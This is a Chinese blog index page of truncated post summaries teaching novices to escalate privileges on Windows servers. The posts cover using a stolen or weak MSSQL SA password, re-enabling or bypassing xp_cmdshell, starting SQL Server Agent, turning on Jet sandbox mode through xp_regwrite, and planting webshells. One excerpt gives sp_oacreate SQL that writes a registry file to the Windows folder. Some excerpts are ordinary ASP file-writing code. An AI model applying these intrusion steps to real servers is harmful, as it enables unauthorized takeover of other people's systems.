小宝哥哥

摘要： 在webshell提权过程中使用MSSQL的SA账号来提升权限拿服务器是比较有效的方法，但是在我们得到SA账号的密码去执行系统命令的时候往往会遇到各类错误提示，无法正常执行系统命令。很多菜鸟朋友们遇到类似的问题可能就会选择放弃，其实这类问题是很常见的，现在管理员安全意识有所提高，往往对SA账号做了限制，或者是对我们执行系统命令所需要的xp_cmdshell储存过程做了修改或者删除，这个xp_cmdshell就类似于我们的wscript.shell一样了，有时候遇到管理将该组件删除了的我们自己上传cmd也就不能执行了。但是这类情况我们也可以突破的，下面给大家列出一些实用SA账号执行系统命令出现的 阅读全文

摘要： 尝试在nb里面恢复cmdshell、oacreat都没有成功，所以开启sqlserveragent;exec master.dbo.xp_servicecontrol 'start','sqlserveragent';-- 还是没有成功，无奈之中希望寄托于沙盒模式，执行如下语句开启沙盒模式;execmaster..xp_regwrite 'hkey_local_machine','software\microsoft\jet\4.0\engines','sandboxmode','reg_dword' 阅读全文

摘要： 方法一：createtextfile生成文件方法 function WriteToFile(FileName,FileContent) set fso=server.createobject("scripting.filesystemobject") set fp=fso.createtextfile(server.mappath(FileName),,True) fp.write(FileContent) end function 方法二：ADODB.Stream生成文件方法 Set ccObjStream = Server.CreateObject("ADOD 阅读全文

摘要： FSO 不能操作二进制文件，要操作二进制文件，请使用：ADODB.Stream。 创建文件 dim fso, f set fso = server.CreateObject("Scripting.FileSystemObject") set f = fso.CreateTextFile("C:\test.txt", true) '第二个参数表示目标文件存在时是否覆盖 f.Write("写入内容") f.WriteLine("写入内容并换行") f.WriteBlankLines(3) '写入三个空白 阅读全文

摘要： 这是第三次发有关1433弱口令的教程了，前面两次教程也针对1433的修复和提权进行了详细的讲解，今天依然给大家带来一个1433弱口令的提权方法。说是巧妙，其实很多大牛早就在使用了，本教程旨在对初学1433弱口令提权的菜鸟们，高手请无视。 连接弱口令主机 随便运行个dos命令，看到错误提示：Error Message:xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)上一期教程的服务器也是这个错误，我们绕过错误去拿webshell，是寻找服务器上的网站，利用分离器传小马，再传大马。 这期我们就讲下这个错误产生的原因，以及巧妙的修复其实也可以说是绕过他来提权。 错误 阅读全文

摘要： --写个修改注册表的文件declare @o int,@f int,@t int,@ret intexec sp_oacreate 'scripting.filesystemobject',@o outexec sp_oamethod @o,'createtextfile',@f out,'C:\WINDOWS\Config\wfo.reg',1exec @ret=sp_oamethod @f,'writeline',NULL,'Windows Regis--写个修改注册表的文件 declare @o int,@f int 阅读全文